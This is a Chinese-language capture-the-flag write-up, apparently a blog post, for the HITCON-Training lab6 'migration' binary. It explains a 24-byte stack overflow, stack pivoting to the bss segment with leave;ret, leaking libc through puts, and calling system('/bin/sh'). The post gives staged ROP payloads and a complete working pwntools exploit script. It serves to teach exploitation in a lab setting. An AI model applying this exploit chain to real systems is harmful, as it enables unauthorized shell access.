HITCON-Training-master lab6 wp

題目的防護機制:

image.png

簡單運行了下,程序輸出了一句話,然后等待我們輸入
ida反編譯:

image.png

程序邏輯很清楚,先判斷count的值是否等于1337,不等的話就執(zhí)行exit()函數(shù)
然后count++,這說明我們不能重復利用main函數(shù),即不能將返回地址設為main
然后輸出一句話 ,再讀入數(shù)據(jù)
很明顯,再read()函數(shù)中存在棧溢出漏洞,因為,buf的大小為0x28,但是它讀入0x40的數(shù)據(jù)
但是我們通過棧溢出能控制的大小只有0x40-0x28 = 0x18 (24個字節(jié))
所以我們構造的rop鏈不能太長,結合題目的hint 很明顯我們要一步步將棧劫持到不同的地方

棧遷移:主要是為了解決棧溢出可以溢出空間大小不足的問題
棧遷移的實現(xiàn):(其中一種辦法)
通過將ebp覆蓋成我們構造的fake_ebp ,然后利用leave_ret這個gadget將esp劫持到fake_ebp的地址上
leave_ret相當于:

mov %ebp,%esp  
pop %ebp  
pop %eip  

了解完棧遷移,再來看這題
解題思路:

  1. 通過劫持ebp和esp將棧劫持到bss段
  2. 利用puts函數(shù)泄露libc內存空間信息,得到system函數(shù)在內存中的地址 ,順便將棧劫持到另一個地方
  3. 通過read函數(shù)讀入"/bin/sh"字符串 然后返回調用system函數(shù)getshell
  • 第一步:將棧劫持到bss段
    我將棧劫持到 bss+0x500處
payload = 'a'*0x28 + p32(bss+0x500) + p32(read_plt) 
payload+= p32(leave_ret) + p32(0) + p32(bss+0x500) + p32(0x100)

棧的布局如下:

image.png

函數(shù)執(zhí)行完后會將bss+0x500 pop給ebp 然后再執(zhí)行l(wèi)eave_ret指令就會將 ebp的值賦給esp,這樣程序的棧就被劫持到bss + 0x500 了

*第二步:通過puts函數(shù)泄露出libc的內存信息
泄露地址的同時要將棧遷移到另一個我們能控制的地方,這里我選的是bss+0x400

payload = p32(bss+0x400) + p32(puts_plt) + p32(pop1ret) + p32(puts_got) + p32(read_plt) + p32(leave_ret)
payload += p32(0) + p32(bss+0x400)+ p32(0x100)  

棧的情況:

image.png

*第三步:執(zhí)行system函數(shù)

payload = p32(bss+0x500) + p32(read_plt) + p32(pop3ret)+p32(0) + p32(bss+0x500) + p32(0x100)  
payload += p32(system_add) + 'bbbb' + p32(bss+0x500)  

棧的情況:

image.png

在放一張棧的總變化情況:
buf = bss + 0x500
buf2 = bss + 0x400


image.png

exp:

#!/usr/bin/env python  
from pwn import*  
context.log_level="debug"  
  
p = process('./migration')  
lib = ELF('/lib/i386-linux-gnu/libc.so.6')  
elf = ELF('./migration')  
  
read_plt = elf.symbols['read']  
puts_plt = elf.symbols['puts']  
puts_got = elf.got['puts']  
read_got = elf.got['read']  
buf = elf.bss() + 0x500  
buf2 = elf.bss() + 0x400  
  
pop1ret = 0x804836d  
pop3ret = 0x8048569  
leave_ret = 0x08048418  
  
puts_lib = lib.symbols['puts']  
system_lib = lib.symbols['system']  
  
p.recv()  
  
log.info("*********************change stack_space*********************")  
junk = 'a'*0x28  
payload = junk + p32(buf) + p32(read_plt) + p32(leave_ret) + p32(0) + p32(buf) + p32(0x100)  
p.send(payload)  
  
  
log.info("*********************leak libc memory address*********************")  
  
payload1 = p32(buf2) + p32(puts_plt) + p32(pop1ret) + p32(puts_got) + p32(read_plt) + p32(leave_ret)  
payload1 += p32(0) + p32(buf2) + p32(0x100)  
p.send(payload1)  
  
puts_add = u32(p.recv(4))  
lib_base = puts_add - puts_lib  
print "libc base address-->[%s]"%hex(lib_base)  
system_add = lib_base + system_lib  
print "system address -->[%s]"%hex(system_add)  
  
log.info("*********************write binsh*********************")  
payload3= p32(buf) + p32(read_plt) + p32(pop3ret) + p32(0) + p32(buf) + p32(0x100) + p32(system_add) + 'bbbb' + p32(buf)  
p.send(payload3)  
p.send("/bin/sh\0")  
p.interactive()  
?著作權歸作者所有,轉載或內容合作請聯(lián)系作者
【社區(qū)內容提示】社區(qū)部分內容疑似由AI輔助生成,瀏覽時請結合常識與多方信息審慎甄別。
平臺聲明:文章內容(如有圖片或視頻亦包括在內)由作者上傳并發(fā)布,文章內容僅代表作者本人觀點,簡書系信息發(fā)布平臺,僅提供信息存儲服務。

相關閱讀更多精彩內容

友情鏈接更多精彩內容